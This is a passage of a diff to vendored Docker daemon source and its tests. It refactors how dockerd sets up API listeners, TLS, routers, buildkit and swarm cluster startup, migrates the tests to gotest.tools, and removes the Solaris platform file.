tlsConfig - } - - if len(cli.Config.Hosts) == 0 { - cli.Config.Hosts = make([]string, 1) + serverConfig, err := newAPIServerConfig(cli) + if err != nil { + return fmt.Errorf("Failed to create API server: %v", err) } + cli.api = apiserver.New(serverConfig) - api := apiserver.New(serverConfig) - cli.api = api - - for i := 0; i < len(cli.Config.Hosts); i++ { - var err error - if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { - return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) - } - - protoAddr := cli.Config.Hosts[i] - protoAddrParts := strings.SplitN(protoAddr, "://", 2) - if len(protoAddrParts) != 2 { - return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) - } - - proto := protoAddrParts[0] - addr := protoAddrParts[1] - - // It's a bad idea to bind to TCP without tlsverify. - if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { - logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") - } - ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) - if err != nil { - return err - } - ls = wrapListeners(proto, ls) - // If we're binding to a TCP port, make sure that a container doesn't try to use it. - if proto == "tcp" { - if err := allocateDaemonPort(addr); err != nil { - return err - } - } - logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) - api.Accept(addr, ls...) + hosts, err := loadListeners(cli, serverConfig) + if err != nil { + return fmt.Errorf("Failed to load listeners: %v", err) } - if err := migrateKey(cli.Config); err != nil { + registryService, err := registry.NewService(cli.Config.ServiceOptions) + if err != nil { return err } - // FIXME: why is this down here instead of with the other TrustKey logic above? 
- cli.TrustKeyPath = opts.common.TrustKey - - registryService := registry.NewService(cli.Config.ServiceOptions) - containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...) + rOpts, err := cli.getRemoteOptions() + if err != nil { + return fmt.Errorf("Failed to generate containerd options: %v", err) + } + containerdRemote, err := libcontainerd.New(filepath.Join(cli.Config.Root, "containerd"), filepath.Join(cli.Config.ExecRoot, "containerd"), rOpts...) if err != nil { return err } signal.Trap(func() { cli.stop() <-stopc // wait for daemonCli.start() to return - }) + }, logrus.StandardLogger()) + + // Notify that the API is active, but before daemon is set up. + preNotifySystem() - d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote) + pluginStore := plugin.NewStore() + + if err := cli.initMiddlewares(cli.api, serverConfig, pluginStore); err != nil { + logrus.Fatalf("Error creating middlewares: %v", err) + } + + d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote, pluginStore) if err != nil { return fmt.Errorf("Error starting daemon: %v", err) } + d.StoreHosts(hosts) + + // validate after NewDaemon has restored enabled plugins. Dont change order. 
+ if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, pluginStore); err != nil { + return fmt.Errorf("Error validating authorization plugin: %v", err) + } + + // TODO: move into startMetricsServer() if cli.Config.MetricsAddress != "" { if !d.HasExperimental() { return fmt.Errorf("metrics-addr is only supported when experimental is enabled") @@ -274,18 +184,9 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { } } - name, _ := os.Hostname() - - c, err := cluster.New(cluster.Config{ - Root: cli.Config.Root, - Name: name, - Backend: d, - NetworkSubnetsProvider: d, - DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, - RuntimeRoot: cli.getSwarmRunRoot(), - }) + c, err := createAndStartCluster(cli, d) if err != nil { - logrus.Fatalf("Error creating cluster component: %v", err) + logrus.Fatalf("Error starting cluster component: %v", err) } // Restart all autostart containers which has a swarm endpoint @@ -295,20 +196,21 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { logrus.Info("Daemon has completed initialization") - logrus.WithFields(logrus.Fields{ - "version": dockerversion.Version, - "commit": dockerversion.GitCommit, - "graphdriver": d.GraphDriverName(), - }).Info("Docker daemon") - cli.d = d - // initMiddlewares needs cli.d to be populated. Dont change this init order. 
- if err := cli.initMiddlewares(api, serverConfig); err != nil { - logrus.Fatalf("Error creating middlewares: %v", err) + routerOptions, err := newRouterOptions(cli.Config, d) + if err != nil { + return err } - d.SetCluster(c) - initRouter(api, d, c) + routerOptions.api = cli.api + routerOptions.cluster = c + + initRouter(routerOptions) + + // process cluster change notifications + watchCtx, cancel := context.WithCancel(context.Background()) + defer cancel() + go d.ProcessClusterNotifications(watchCtx, c.GetWatchStream()) cli.setupConfigReloadTrap() @@ -316,7 +218,7 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { // We need to start it as a goroutine and wait on it so // daemon doesn't exit serveAPIWait := make(chan error) - go api.Wait(serveAPIWait) + go cli.api.Wait(serveAPIWait) // after the daemon is done setting up we can notify systemd api notifySystem() @@ -334,36 +236,105 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { return nil } +type routerOptions struct { + sessionManager *session.Manager + buildBackend *buildbackend.Backend + buildCache *fscache.FSCache // legacy + buildkit *buildkit.Builder + daemon *daemon.Daemon + api *apiserver.Server + cluster *cluster.Cluster +} + +func newRouterOptions(config *config.Config, daemon *daemon.Daemon) (routerOptions, error) { + opts := routerOptions{} + sm, err := session.NewManager() + if err != nil { + return opts, errors.Wrap(err, "failed to create sessionmanager") + } + + builderStateDir := filepath.Join(config.Root, "builder") + + buildCache, err := fscache.NewFSCache(fscache.Opt{ + Backend: fscache.NewNaiveCacheBackend(builderStateDir), + Root: builderStateDir, + GCPolicy: fscache.GCPolicy{ // TODO: expose this in config + MaxSize: 1024 * 1024 * 512, // 512MB + MaxKeepDuration: 7 * 24 * time.Hour, // 1 week + }, + }) + if err != nil { + return opts, errors.Wrap(err, "failed to create fscache") + } + + manager, err := dockerfile.NewBuildManager(daemon.BuilderBackend(), sm, 
buildCache, daemon.IDMappings()) + if err != nil { + return opts, err + } + + buildkit, err := buildkit.New(buildkit.Opt{ + SessionManager: sm, + Root: filepath.Join(config.Root, "buildkit"), + Dist: daemon.DistributionServices(), + }) + if err != nil { + return opts, err + } + + bb, err := buildbackend.NewBackend(daemon.ImageService(), manager, buildCache, buildkit) + if err != nil { + return opts, errors.Wrap(err, "failed to create buildmanager") + } + + return routerOptions{ + sessionManager: sm, + buildBackend: bb, + buildCache: buildCache, + buildkit: buildkit, + daemon: daemon, + }, nil +} + func (cli *DaemonCli) reloadConfig() { - reload := func(config *daemon.Config) { + reload := func(c *config.Config) { // Revalidate and reload the authorization plugins - if err := validateAuthzPlugins(config.AuthorizationPlugins, cli.d.PluginStore); err != nil { + if err := validateAuthzPlugins(c.AuthorizationPlugins, cli.d.PluginStore); err != nil { logrus.Fatalf("Error validating authorization plugin: %v", err) return } - cli.authzMiddleware.SetPlugins(config.AuthorizationPlugins) + cli.authzMiddleware.SetPlugins(c.AuthorizationPlugins) + + // The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented + // to be reserved for Docker's internal use, but this was never enforced. Allowing + // configured labels to use these namespaces are deprecated for 18.05. + // + // The following will check the usage of such labels, and report a warning for deprecation. + // + // TODO: At the next stable release, the validation should be folded into the other + // configuration validation functions and an error will be returned instead, and this + // block should be deleted. 
+ if err := config.ValidateReservedNamespaceLabels(c.Labels); err != nil { + logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err) + } - if err := cli.d.Reload(config); err != nil { + if err := cli.d.Reload(c); err != nil { logrus.Errorf("Error reconfiguring the daemon: %v", err) return } - if config.IsValueSet("debug") { - debugEnabled := utils.IsDebugEnabled() + if c.IsValueSet("debug") { + debugEnabled := debug.IsEnabled() switch { - case debugEnabled && !config.Debug: // disable debug - utils.DisableDebug() - cli.api.DisableProfiler() - case config.Debug && !debugEnabled: // enable debug - utils.EnableDebug() - cli.api.EnableProfiler() + case debugEnabled && !c.Debug: // disable debug + debug.Disable() + case c.Debug && !debugEnabled: // enable debug + debug.Enable() } - } } - if err := daemon.ReloadConfiguration(*cli.configFile, cli.flags, reload); err != nil { + if err := config.Reload(*cli.configFile, cli.flags, reload); err != nil { logrus.Error(err) } } @@ -395,89 +366,118 @@ func shutdownDaemon(d *daemon.Daemon) { } } -func loadDaemonCliConfig(opts daemonOptions) (*daemon.Config, error) { - config := opts.daemonConfig +func loadDaemonCliConfig(opts *daemonOptions) (*config.Config, error) { + conf := opts.daemonConfig flags := opts.flags - config.Debug = opts.common.Debug - config.Hosts = opts.common.Hosts - config.LogLevel = opts.common.LogLevel - config.TLS = opts.common.TLS - config.TLSVerify = opts.common.TLSVerify - config.CommonTLSOptions = daemon.CommonTLSOptions{} + conf.Debug = opts.Debug + conf.Hosts = opts.Hosts + conf.LogLevel = opts.LogLevel + conf.TLS = opts.TLS + conf.TLSVerify = opts.TLSVerify + conf.CommonTLSOptions = config.CommonTLSOptions{} + + if opts.TLSOptions != nil { + conf.CommonTLSOptions.CAFile = opts.TLSOptions.CAFile + conf.CommonTLSOptions.CertFile = opts.TLSOptions.CertFile + conf.CommonTLSOptions.KeyFile = opts.TLSOptions.KeyFile + } - if opts.common.TLSOptions != nil { - 
config.CommonTLSOptions.CAFile = opts.common.TLSOptions.CAFile - config.CommonTLSOptions.CertFile = opts.common.TLSOptions.CertFile - config.CommonTLSOptions.KeyFile = opts.common.TLSOptions.KeyFile + if conf.TrustKeyPath == "" { + conf.TrustKeyPath = filepath.Join( + getDaemonConfDir(conf.Root), + defaultTrustKeyFile) + } + + if flags.Changed("graph") && flags.Changed("data-root") { + return nil, fmt.Errorf(`cannot specify both "--graph" and "--data-root" option`) } if opts.configFile != "" { - c, err := daemon.MergeDaemonConfigurations(config, flags, opts.configFile) + c, err := config.MergeDaemonConfigurations(conf, flags, opts.configFile) if err != nil { - if flags.Changed(flagDaemonConfigFile) || !os.IsNotExist(err) { - return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v\n", opts.configFile, err) + if flags.Changed("config-file") || !os.IsNotExist(err) { + return nil, fmt.Errorf("unable to configure the Docker daemon with file %s: %v", opts.configFile, err) } } // the merged configuration can be nil if the config file didn't exist. // leave the current configuration as it is if when that happens. if c != nil { - config = c + conf = c } } - if err := daemon.ValidateConfiguration(config); err != nil { + if err := config.Validate(conf); err != nil { return nil, err } - // Labels of the docker engine used to allow multiple values associated with the same key. - // This is deprecated in 1.13, and, be removed after 3 release cycles. - // The following will check the conflict of labels, and report a warning for deprecation. - // - // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be - // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): + if runtime.GOOS != "windows" { + if flags.Changed("disable-legacy-registry") { + // TODO: Remove this error after 3 release cycles (18.03) + return nil, errors.New("ERROR: The '--disable-legacy-registry' flag has been removed. 
Interacting with legacy (v1) registries is no longer supported") + } + if !conf.V2Only { + // TODO: Remove this error after 3 release cycles (18.03) + return nil, errors.New("ERROR: The 'disable-legacy-registry' configuration option has been removed. Interacting with legacy (v1) registries is no longer supported") + } + } + + if flags.Changed("graph") { + logrus.Warnf(`The "-g / --graph" flag is deprecated. Please use "--data-root" instead`) + } + + // Check if duplicate label-keys with different values are found + newLabels, err := config.GetConflictFreeLabels(conf.Labels) + if err != nil { + return nil, err + } + // The namespaces com.docker.*, io.docker.*, org.dockerproject.* have been documented + // to be reserved for Docker's internal use, but this was never enforced. Allowing + // configured labels to use these namespaces are deprecated for 18.05. // - // newLabels, err := daemon.GetConflictFreeLabels(config.Labels) - // if err != nil { - // return nil, err - // } - // config.Labels = newLabels + // The following will check the usage of such labels, and report a warning for deprecation. // - if _, err := daemon.GetConflictFreeLabels(config.Labels); err != nil { - logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + // TODO: At the next stable release, the validation should be folded into the other + // configuration validation functions and an error will be returned instead, and this + // block should be deleted. 
+ if err := config.ValidateReservedNamespaceLabels(newLabels); err != nil { + logrus.Warnf("Configured labels using reserved namespaces is deprecated: %s", err) } + conf.Labels = newLabels // Regardless of whether the user sets it to true or false, if they // specify TLSVerify at all then we need to turn on TLS - if config.IsValueSet(cliflags.FlagTLSVerify) { - config.TLS = true + if conf.IsValueSet(FlagTLSVerify) { + conf.TLS = true } // ensure that the log level is the one set after merging configurations - cliflags.SetLogLevel(config.LogLevel) + setLogLevel(conf.LogLevel) - return config, nil + return conf, nil } -func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { +func initRouter(opts routerOptions) { decoder := runconfig.ContainerDecoder{} routers := []router.Router{ // we need to add the checkpoint router before the container router or the DELETE gets masked - checkpointrouter.NewRouter(d, decoder), - container.NewRouter(d, decoder), - image.NewRouter(d, decoder), - systemrouter.NewRouter(d, c), - volume.NewRouter(d), - build.NewRouter(dockerfile.NewBuildManager(d)), - swarmrouter.NewRouter(c), - pluginrouter.NewRouter(d.PluginManager()), + checkpointrouter.NewRouter(opts.daemon, decoder), + container.NewRouter(opts.daemon, decoder), + image.NewRouter(opts.daemon.ImageService()), + systemrouter.NewRouter(opts.daemon, opts.cluster, opts.buildCache, opts.buildkit), + volume.NewRouter(opts.daemon.VolumesService()), + build.NewRouter(opts.buildBackend, opts.daemon), + sessionrouter.NewRouter(opts.sessionManager), + swarmrouter.NewRouter(opts.cluster), + pluginrouter.NewRouter(opts.daemon.PluginManager()), + distributionrouter.NewRouter(opts.daemon.ImageService()), } - if d.NetworkControllerEnabled() { - routers = append(routers, network.NewRouter(d, c)) + if opts.daemon.NetworkControllerEnabled() { + routers = append(routers, network.NewRouter(opts.daemon, opts.cluster)) } - if d.HasExperimental() { + if opts.daemon.HasExperimental() { 
for _, r := range routers { for _, route := range r.Routes() { if experimental, ok := route.(router.ExperimentalRoute); ok { @@ -487,36 +487,150 @@ func initRouter(s *apiserver.Server, d *daemon.Daemon, c *cluster.Cluster) { } } - s.InitRouter(utils.IsDebugEnabled(), routers...) + opts.api.InitRouter(routers...) } -func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config) error { +// TODO: remove this from cli and return the authzMiddleware +func (cli *DaemonCli) initMiddlewares(s *apiserver.Server, cfg *apiserver.Config, pluginStore plugingetter.PluginGetter) error { v := cfg.Version - exp := middleware.NewExperimentalMiddleware(cli.d.HasExperimental()) + exp := middleware.NewExperimentalMiddleware(cli.Config.Experimental) s.UseMiddleware(exp) vm := middleware.NewVersionMiddleware(v, api.DefaultVersion, api.MinVersion) s.UseMiddleware(vm) - if cfg.EnableCors { + if cfg.CorsHeaders != "" { c := middleware.NewCORSMiddleware(cfg.CorsHeaders) s.UseMiddleware(c) } - if err := validateAuthzPlugins(cli.Config.AuthorizationPlugins, cli.d.PluginStore); err != nil { - return fmt.Errorf("Error validating authorization plugin: %v", err) - } - cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, cli.d.PluginStore) + cli.authzMiddleware = authorization.NewMiddleware(cli.Config.AuthorizationPlugins, pluginStore) + cli.Config.AuthzMiddleware = cli.authzMiddleware s.UseMiddleware(cli.authzMiddleware) return nil } +func (cli *DaemonCli) getRemoteOptions() ([]libcontainerd.RemoteOption, error) { + opts := []libcontainerd.RemoteOption{} + + pOpts, err := cli.getPlatformRemoteOptions() + if err != nil { + return nil, err + } + opts = append(opts, pOpts...) 
+ return opts, nil +} + +func newAPIServerConfig(cli *DaemonCli) (*apiserver.Config, error) { + serverConfig := &apiserver.Config{ + Logging: true, + SocketGroup: cli.Config.SocketGroup, + Version: dockerversion.Version, + CorsHeaders: cli.Config.CorsHeaders, + } + + if cli.Config.TLS { + tlsOptions := tlsconfig.Options{ + CAFile: cli.Config.CommonTLSOptions.CAFile, + CertFile: cli.Config.CommonTLSOptions.CertFile, + KeyFile: cli.Config.CommonTLSOptions.KeyFile, + ExclusiveRootPools: true, + } + + if cli.Config.TLSVerify { + // server requires and verifies client's certificate + tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert + } + tlsConfig, err := tlsconfig.Server(tlsOptions) + if err != nil { + return nil, err + } + serverConfig.TLSConfig = tlsConfig + } + + if len(cli.Config.Hosts) == 0 { + cli.Config.Hosts = make([]string, 1) + } + + return serverConfig, nil +} + +func loadListeners(cli *DaemonCli, serverConfig *apiserver.Config) ([]string, error) { + var hosts []string + for i := 0; i < len(cli.Config.Hosts); i++ { + var err error + if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { + return nil, fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) + } + + protoAddr := cli.Config.Hosts[i] + protoAddrParts := strings.SplitN(protoAddr, "://", 2) + if len(protoAddrParts) != 2 { + return nil, fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) + } + + proto := protoAddrParts[0] + addr := protoAddrParts[1] + + // It's a bad idea to bind to TCP without tlsverify. + if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { + logrus.Warn("[!] 
DON'T BIND ON ANY IP ADDRESS WITHOUT setting --tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") + } + ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) + if err != nil { + return nil, err + } + ls = wrapListeners(proto, ls) + // If we're binding to a TCP port, make sure that a container doesn't try to use it. + if proto == "tcp" { + if err := allocateDaemonPort(addr); err != nil { + return nil, err + } + } + logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) + hosts = append(hosts, protoAddrParts[1]) + cli.api.Accept(addr, ls...) + } + + return hosts, nil +} + +func createAndStartCluster(cli *DaemonCli, d *daemon.Daemon) (*cluster.Cluster, error) { + name, _ := os.Hostname() + + // Use a buffered channel to pass changes from store watch API to daemon + // A buffer allows store watch API and daemon processing to not wait for each other + watchStream := make(chan *swarmapi.WatchMessage, 32) + + c, err := cluster.New(cluster.Config{ + Root: cli.Config.Root, + Name: name, + Backend: d, + VolumeBackend: d.VolumesService(), + ImageBackend: d.ImageService(), + PluginBackend: d.PluginManager(), + NetworkSubnetsProvider: d, + DefaultAdvertiseAddr: cli.Config.SwarmDefaultAdvertiseAddr, + RaftHeartbeatTick: cli.Config.SwarmRaftHeartbeatTick, + RaftElectionTick: cli.Config.SwarmRaftElectionTick, + RuntimeRoot: cli.getSwarmRunRoot(), + WatchStream: watchStream, + }) + if err != nil { + return nil, err + } + d.SetCluster(c) + err = c.Start() + + return c, err +} + // validates that the plugins requested with the --authorization-plugin flag are valid AuthzDriver // plugins present on the host and available to the daemon func validateAuthzPlugins(requestedPlugins []string, pg plugingetter.PluginGetter) error { for _, reqPlugin := range requestedPlugins { - if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, plugingetter.LOOKUP); err != nil { + if _, err := pg.Get(reqPlugin, authorization.AuthZApiImplements, 
plugingetter.Lookup); err != nil { return err } } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go index 623aaf4b09..6d013b8103 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go @@ -1,5 +1,9 @@ package main +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { +} + // notifySystem sends a message to the host when the server is ready to be used func notifySystem() { } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go index a556daa187..cf2d65275f 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go @@ -1,11 +1,13 @@ -// +build linux - package main import systemdDaemon "github.com/coreos/go-systemd/daemon" +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { +} + // notifySystem sends a message to the host when the server is ready to be used func notifySystem() { // Tell the init daemon we are accepting requests - go systemdDaemon.SdNotify("READY=1") + go systemdDaemon.SdNotify(false, systemdDaemon.SdNotifyReady) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go deleted file mode 100644 index 974ba16345..0000000000 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go +++ /dev/null @@ -1,85 +0,0 @@ -// +build solaris - -package main - -import ( - "fmt" - "net" - "os" - "path/filepath" - "syscall" - - "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" -) - -const defaultDaemonConfigFile = "" - -// currentUserIsOwner checks whether the current user is 
the owner of the given -// file. -func currentUserIsOwner(f string) bool { - if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { - if int(fileInfo.UID()) == os.Getuid() { - return true - } - } - return false -} - -// setDefaultUmask sets the umask to 0022 to avoid problems -// caused by custom umask -func setDefaultUmask() error { - desiredUmask := 0022 - syscall.Umask(desiredUmask) - if umask := syscall.Umask(desiredUmask); umask != desiredUmask { - return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) - } - - return nil -} - -func getDaemonConfDir(_ string) string { - return "/etc/docker" -} - -// setupConfigReloadTrap configures the USR2 signal to reload the configuration. -func (cli *DaemonCli) setupConfigReloadTrap() { -} - -// notifySystem sends a message to the host when the server is ready to be used -func notifySystem() { -} - -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { - opts := []libcontainerd.RemoteOption{} - if cli.Config.ContainerdAddr != "" { - opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) - } else { - opts = append(opts, libcontainerd.WithStartDaemon(true)) - } - return opts -} - -// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to -// store their state. -func (cli *DaemonCli) getLibcontainerdRoot() string { - return filepath.Join(cli.Config.ExecRoot, "libcontainerd") -} - -// getSwarmRunRoot gets the root directory for swarm to store runtime state -// For example, the control socket -func (cli *DaemonCli) getSwarmRunRoot() string { - return filepath.Join(cli.Config.ExecRoot, "swarm") -} - -func allocateDaemonPort(addr string) error { - return nil -} - -// notifyShutdown is called after the daemon shuts down but before the process exits. 
-func notifyShutdown(err error) { -} - -func wrapListeners(proto string, ls []net.Listener) []net.Listener { - return ls -} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go index b364f87843..ad447e3b90 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go @@ -3,34 +3,31 @@ package main import ( "testing" - "github.com/Sirupsen/logrus" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/daemon" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" + "github.com/docker/docker/daemon/config" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) -func defaultOptions(configFile string) daemonOptions { - opts := daemonOptions{ - daemonConfig: &daemon.Config{}, - flags: &pflag.FlagSet{}, - common: cliflags.NewCommonOptions(), - } - opts.common.InstallFlags(opts.flags) - opts.daemonConfig.InstallFlags(opts.flags) - opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "") +func defaultOptions(configFile string) *daemonOptions { + opts := newDaemonOptions(&config.Config{}) + opts.flags = &pflag.FlagSet{} + opts.InstallFlags(opts.flags) + installConfigFlags(opts.daemonConfig, opts.flags) + opts.flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "") opts.configFile = configFile return opts } func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { opts := defaultOptions("") - opts.common.Debug = true + opts.Debug = true loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) if !loadedConfig.Debug { t.Fatalf("expected debug to be copied from the common flags, got false") } @@ -38,108 +35,148 @@ func 
TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { func TestLoadDaemonCliConfigWithTLS(t *testing.T) { opts := defaultOptions("") - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" - opts.common.TLS = true + opts.TLSOptions.CAFile = "/tmp/ca.pem" + opts.TLS = true loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem") + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("/tmp/ca.pem", loadedConfig.CommonTLSOptions.CAFile)) } func TestLoadDaemonCliConfigWithConflicts(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels": ["l3=foo"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + opts := defaultOptions(configFile) + flags := opts.flags + + assert.Check(t, flags.Set("config-file", configFile)) + assert.Check(t, flags.Set("label", "l1=bar")) + assert.Check(t, flags.Set("label", "l2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: labels")) +} + +func TestLoadDaemonCliWithConflictingNodeGenericResources(t *testing.T) { + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"node-generic-resources": ["foo=bar", "bar=baz"]}`)) defer tempFile.Remove() - configFile := tempFile.Name() + configFile := tempFile.Path() opts := defaultOptions(configFile) flags := opts.flags - assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile)) - assert.NilError(t, flags.Set("label", "l1=bar")) - assert.NilError(t, flags.Set("label", "l2=baz")) + assert.Check(t, flags.Set("config-file", configFile)) + assert.Check(t, flags.Set("node-generic-resource", "r1=bar")) + assert.Check(t, flags.Set("node-generic-resource", "r2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: 
node-generic-resources")) +} + +func TestLoadDaemonCliWithConflictingLabels(t *testing.T) { + opts := defaultOptions("") + flags := opts.flags + + assert.Check(t, flags.Set("label", "foo=bar")) + assert.Check(t, flags.Set("label", "foo=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Check(t, is.Error(err, "conflict labels for foo=baz and foo=bar")) +} + +func TestLoadDaemonCliWithDuplicateLabels(t *testing.T) { + opts := defaultOptions("") + flags := opts.flags + + assert.Check(t, flags.Set("label", "foo=the-same")) + assert.Check(t, flags.Set("label", "foo=the-same")) _, err := loadDaemonCliConfig(opts) - assert.Error(t, err, "as a flag and in the configuration file: labels") + assert.Check(t, err) } func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": true}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, true) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal(loadedConfig.TLS, true)) } func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": false}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, true) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, 
loadedConfig.TLS) } func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts := defaultOptions(tempFile.Path()) + opts.TLSOptions.CAFile = "/tmp/ca.pem" loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.TLS, false) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, !loadedConfig.TLS) } func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"log-level": "warn"}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.LogLevel, "warn") - assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("warn", loadedConfig.LogLevel)) + assert.Check(t, is.Equal(logrus.WarnLevel, logrus.GetLevel())) } func TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) { content := `{"tlscacert": "/etc/certs/ca.pem", "log-driver": "syslog"}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer 